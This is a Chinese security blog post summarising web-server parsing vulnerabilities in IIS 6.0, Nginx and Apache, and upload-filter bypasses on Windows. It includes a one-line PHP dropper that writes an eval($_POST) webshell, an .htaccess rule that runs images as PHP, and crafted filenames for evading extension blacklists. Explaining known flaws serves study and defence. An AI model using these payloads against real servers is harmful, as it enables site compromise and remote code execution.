解析漏洞总结

最新推荐文章于 2024-02-17 20:22:01 发布
最新推荐文章于 2024-02-17 20:22:01 发布
阅读量5.4k 收藏 7
点赞数 2

一、IIS 5.x/6.0解析漏洞

IIS 6.0解析利用方法有两种

1.目录解析

/xx.asp/xx.jpg

2.文件解析

sp.asp;.jpg

第一种,在网站下建立文件夹的名字为 .asp、.asa 的文件夹,其目录内的任何扩展名的文件都被IIS当作asp文件来解析并执行。

例如创建目录 sp.asp,那么

/sp.asp/1.jpg

 将被当作asp文件来执行。假设黑阔可以控制上传文件夹路径,就可以不管你上传后你的图片改不改名都能拿shell了。

第二种,在IIS6.0下,分号后面的不被解析,也就是说

sp.asp;.jpg

会被服务器看成是sp.asp

还有IIS6.0 默认的可执行文件除了asp还包含这三种

/sp.asa

/sp.cer

/sp.cdx

 乌云上的IIS 6.0解析漏洞利用案例

http://www.wooyun.org/searchbug.php?q=IIS6.0


二、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞

Nginx解析漏洞这个伟大的漏洞是我国安全组织80sec发现的…

在默认Fast-CGI开启状况下,黑阔上传一个名字为sp.jpg,内容为

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

 

的文件,然后访问sp.jpg/.php,在这个目录下就会生成一句话木马 shell.php

这个漏洞案例

WooYun: 用友软件某分站SQL注入漏洞+nginx解析漏洞

WooYun: 新浪网分站多处安全漏洞(nginx解析+SQL注射等)小礼包

WooYun: kingsoft.com某x级域名nginx解析漏洞+爆路径


三、Nginx <8.03 空字节代码执行漏洞

影响版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37

Nginx在图片中嵌入PHP代码然后通过访问

xxx.jpg%00.php

 

来执行其中的代码

Nginx 空字节代执行漏洞案例

http://www.wooyun.org/searchbug.php?q=%2500.php


四、Apache解析漏洞

Apache 是从右到左开始判断解析,如果为不可识别解析,就再往左判断.

比如 sec.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把sec.php.owf.rar解析成php.

如何判断是不是合法的后缀就是这个漏洞的利用关键,测试时可以尝试上传一个sec.php.rara.jpg.png…(把你知道的常见后缀都写上…)去测试是否是合法后缀

Apache解析漏洞案例

http://www.wooyun.org/searchbug.php?q=apache%E8%A7%A3%E6%9E%90


五、其他

在windows环境下,xx.jpg[空格] 或xx.jpg. 这两类文件都是不允许存在的,若这样命名,windows会默认除去空格或点,黑客可以通过抓包,在文件名后加一个空格或者点绕过黑名单。

若上传成功,空格和点都会被windows自动消除,这样也可以getshell。

如果在Apache中.htaccess可被执行.且可被上传.那可以尝试在.htaccess中写入:

<FilesMatch "sec.jpg"> SetHandler application/x-httpd-php </FilesMatch>

 

然后再上传shell.jpg的木马, 这样shell.jpg就可解析为php文件。

 

whatday
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CISP模拟考试题及答案
07-13
CISP即“注册信息安全专业人员”,系国家对信息安全人员资质的最高认可。英文为Certified Information Security Professional (简称CISP),CISP系经中国信息安全产品测评认证中心(已改名中国信息安全测评中心)实施国家认证。CISP是强制培训的。如果想参加CISP考试,必须要求出具授权培训机构的培训合格证明。
常见的解析漏洞总结
浅浅的博客
06-14 5827
一、解析漏洞 解析漏洞指的是服务器应用程序在解析某些精心构造的后缀文件时,会将其解析成网页脚本,从而导致网站的沦陷。大部分解析漏洞的产生都是由应用程序本身的漏洞导致的。 二、常见的解析漏洞 1、IIS5.x-6.x解析漏洞 使用 IIS5.x-6.x 版本的服务器,大多为Windows server 2003,网站比较古老,开发语句一般为asp;该解析...
解析漏洞的定义和常见的解析漏洞总结
橘子女侠
06-09 5181
目录 一、什么是解析漏洞 二、常见的解析漏洞 1、IIS 5.x/6.0解析漏洞 2、IIS 7.0/IIS 7.5/ Nginx <8.03畸形解析漏洞 3、Nginx <8.03空字节代码执行漏洞 4、Apache解析漏洞 一、什么是解析漏洞 解析漏洞是指服务器应用程序在解析某些精心构造的后缀文件时,会将其解析成网页脚本,从而导致网站的沦陷。大部分解析漏洞的产生都...
Apache Httpd 常见漏洞解析(全)
最新发布
黑战士的博客
02-17 1615
Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞。在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。
CISP-PTE选择题整理(一)
千寻的博客
10-24 6528
LDAP认证查询语句句为:(&(USER=Uname)(PASSWORD=Pwd)) ,Uname和pwd可控,关于绕过认证下面说法正确的是。在拿到⼀个windows服务器下的webshell之后,我想看看当前在线的用户,下面这些命令可以做到的是。一个⽹站存在命令执⾏漏洞,由于服务器不能上外网,这是我们可以利用什么样的⽅式将文件上传到服务器器。拿到一个windows下的webshell,我想看一下主机的名字,如下命令做不到的是。linux 环境下,查询⽇日志⽂文件最后100⾏行行数据,正确的⽅方式是。
哪些服务器曾被发现文件解析漏洞,哪些服务器曾被发现文件解析漏洞
weixin_30517215的博客
07-31 750
1、Apache1.x 2.x解析漏洞Apache服务器解析文件时,从后向前遍历后缀名,直到遇到第一个可以被识别的后缀名,则按该种后缀方式进行文件解析。这样造成一个危害是:如果应用限制了php等敏感后缀,我们可以通过上传x.php.jpg这种未被拦截的后缀的木马上传,访问时,Apache会因为无法识别jgp,而向前寻找,找到php,按照php文件进行正常解析。木马被执行。2、IIS6.0解析漏洞(...
web安全--文件上传中间件解析漏洞
nareku的博客
04-06 1392
前言 虚拟机还没有安装好所以还没有进行漏洞复现实操,但是又怕忘了所以就记下先。 一.Apache 1)Apache低版本解析漏洞 例:两个文件 1.php 和 2.php.XXX 1.php文件内容: <?php phpinfo();?> 2.php.XXX文件内容: <?php phpinfo();?> 两个文件上传后得到的结果一样,说明2.php.XXX是被当成php文件来执行的 原理: 在解析2.php.XXX 文件时,先识别最后的XXX,如果无法识别出来,则向
哪些服务器曾被发现文件解析漏洞,常见的文件解析漏洞总结
weixin_28752627的博客
07-31 571
常见的文件解析漏洞总结iis解析漏洞解析漏洞主要是说一些特殊文件被iis,apache,nginx等web容器在特殊情况下被解释成脚本文件格式==iis5.x/6.0解析漏洞:==1,目录解析:如果将文件夹的名称命名为xx.asp这种脚本格式,则该文件夹中所有文件都会被当做该种脚本类型执行/xx.asp/xx.jpg一般解析漏洞都是配合编辑器进行利用的,一般ckfind,fckeditor等编辑器...
Web安全测试中常见逻辑漏洞解析
02-25
这里需要根据业务环境的不同总结出自己的预防方式,最好咨询专门的网络安全公司。这个漏洞主要是发生在前端验证处,并且经常发生的位置在于验证码主要发送途径其运行机制如下图所示:黑客只需要抓取R
IIS中常见的十八个安全漏洞
03-04
IIS4hack缓冲溢出主要存在于.htr,.idc和.stm文件中,其对关于这些文件的URL请求没有对名字进行充分的边界检查,导致运行攻击者插入一些后门程序 在系统中下载和执行程序。
漏洞扫描的简单总结概述理解
04-10
自己的一些总结 nginx mysql 还有漏洞扫描的解析,整理
常规的CTF题目解析.pdf
08-07
摘要:颇有回到学生时代老师讲试卷分析,考题讲解的味道啊。从入门到高级的题目讲解,teacher g都有独到的见解。答题人与出题人的较量···文章和线上和线下的讲解。先是工具的准备,规划,如...经验总结 常规题目 Q&A
服务器安全策略经验总结
weixin_68789096的博客
03-31 563
随着计算机网路技术的发展,网络安全面临的威胁日益加剧,各类应用系统的复杂性和多样性导致系统漏洞层出不穷,病毒和恶意代码网上肆虐,和篡改网站的安全事件时有发生。作为网络的核心部分,服务器处于互联网这个相对开放的环境中,越来越多的服务器、服务器安全漏洞,以及商业间谍隐患时刻威胁着服务器安全。服务器的安全问题越来越受到关注。区分危害服务器安全的因素,是构建服务器安全环境的首要任务,根据威胁的性质划分,对服务器安全的威胁可以分为两大类:一类是对服务器的恶意攻。击, 另一类是对服务器的恶意入、侵。
中间件解析漏洞
土拨鼠挖洞中的博客
10-04 5401
  IIS IIS解析漏洞 IIS 6.0解析利用方法有两种: 1:文件解析 在IIS6.0下,分号,冒号后面的不被解析,也就是说 wooyun.asp;123.jpg会被服务器看成是wooyun.asp 以下格式也会被解析:*.asa、*.asp,*.cer;*.cdx   2:目录解析 当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件...
apache、nginx、Tomcat、IIS引擎解析漏洞
Ramona的博客
02-03 664
                                        引擎解析漏洞 常见的web容器有IIS、Apache、Nginx、Tomcat等,以下是详细讲解 IIS         IIS简介 是Windows系统提供的一种服务,它包括WWW服务器、FTP服务器和SMTP服务器          IIS 6.0 当建立*.asa,*.asp格式的文件夹时...
常见的web服务器解析漏洞
qq_45705626的博客
02-01 377
在Apache 1.x和Apche 2.x中存在解析漏洞,但是它们与IIS解析漏洞不同,APache是从右到左开始判断解析,如果为不可识别解析,就再往左判断。是一个不存在的文件,此时会向前递归,将xx.jpg作为php文件解析,从而造成漏洞。作为一种破坏性极强的漏洞,但是微软并没有认识到他的严重性,现在这种漏洞还依然存在,我们也可以在靶机上复现。在II6.0下,分号后面的内容不会被解析,所以我们的xx.asp会被服务器当成ASP脚本执行。如:.php.rar.jpg.png.zip等。
典型漏洞归纳之解析漏洞
weixin_30952535的博客
02-21 351
0x00 总览说明 服务器解析漏洞算是历史比较悠久了,但如今依然广泛存在。在此记录汇总一些常见服务器(WEB server)的解析漏洞,比如IIS6.0、IIS7.5、apache、nginx等方便以后回顾温习。 from:http://thief.one/2016/09/21/%E6%9C%8D%E5%8A%A1%E5%99%A8%E8%A7%A3%E6%9E%90%E6%BC%8F%E...
服务器解析漏洞总结
weixin_30345577的博客
03-16 90
1、Apache1.x 2.x解析漏洞 Apache服务器解析文件时,从后向前遍历后缀名,直到遇到第一个可以被识别的后缀名,则按该种后缀方式进行文件解析。 这样造成一个危害是:如果应用限制了php等敏感后缀,我们可以通过上传x.php.jpg这种未被拦截的后缀的木马上传,访问时,Apache会因为无法识别jgp,而向前寻找,找到php,按照php文件进行正常解析。木马被执行。 2、IIS6....
解析漏洞原理以及相关优缺点
07-15
解析漏洞是指在程序或系统的输入解析过程中存在的安全漏洞,攻击者可以利用这些漏洞来执行恶意操作或绕过安全措施。下面是解析漏洞的原理以及相关的优缺点: 原理: 1. 不正确的输入验证:解析过程中没有对输入进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值